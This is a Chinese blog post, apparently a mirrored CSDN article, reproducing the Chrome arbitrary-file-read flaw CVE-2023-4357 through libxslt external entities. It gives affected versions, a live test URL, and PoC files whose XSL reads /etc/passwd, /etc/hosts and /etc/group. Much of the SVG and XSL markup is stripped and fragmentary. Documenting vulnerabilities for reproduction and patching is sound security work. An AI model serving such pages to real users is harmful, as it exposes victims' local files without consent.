码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现


    Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现

    1.漏洞描述

    该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限

    影响版本

    Google Chrome < 116.0.5845.96

    依赖Chromium内核的组件,如vscode、微信等。

    2.漏洞复现

    开发者提供了一个示例 POC,测试通过微信、抖音之类的 app 直接访问下面的 url 即可触发读取本机的 passwd 文件和 hosts 文件

    该测试 URL:http://188.68.220.248/js.svg

    参考链接:https://bugs.chromium.org/p/chromium/issues/detail?id=1458911

    在这里插入图片描述

    通过了解POC需要配置三个文件

    1.test.svg文件内容

    
    
    
    
    
     
    	
    		
    		    
    #Copy me#
    XSL:
    Vendor:
    Vendor URL:
    document()
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20

    2.test.xsl文件内容

    
    
    
    
    ]> 
    
    

    /etc/passwd: &passwd;

    /etc/hosts: &hosts;

    /etc/group: &group;

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19

    3.server.js文件内容

    const express = require('express');
    const path = require('path');
    
    const app = express();
    const port = 3000;
    
    app.get('/test.svg', (req, res) => {
      res.sendFile(path.join(__dirname, 'test.svg'));
    });
    
    app.get('/test.xsl', (req, res) => {
      res.set('Access-Control-Allow-Origin', '*');
      res.sendFile(path.join(__dirname, 'test.xsl'));
    });
    
    app.listen(port, () => {
      console.log(`Example app listening on port ${port}`);
    });
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    将这三个文件放到服务器上,手机微信点击访问:

    http://xxx.xxx.xxx.xxx/test.svg

    在这里插入图片描述

    可以看到复现成功,成功读取本地文件。

  • 相关阅读:
    Linux (五)- mv 命令
    图像处理ASIC设计方法 笔记5 图像卷积器硬件结构
    【深入浅出imx8企业级开发实战 | 05】搭建OPTEE仿真开发环境
    【PAT(甲级)】1049 Counting Ones(与位数以及位数上的数字有关)
    第十二届蓝桥杯物联网试题(国赛)
    实例讲解将Graph Explorer搬上JupyterLab
    scrapy的使用
    GitLab CI/CD关键词(九):作业依赖needs,GitLab Pages pages,制品依赖 dependencies
    【计算机网络——物理层】
    什么是Java中的Web服务?
  • 原文地址:https://blog.csdn.net/huangyongkang666/article/details/134477830
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号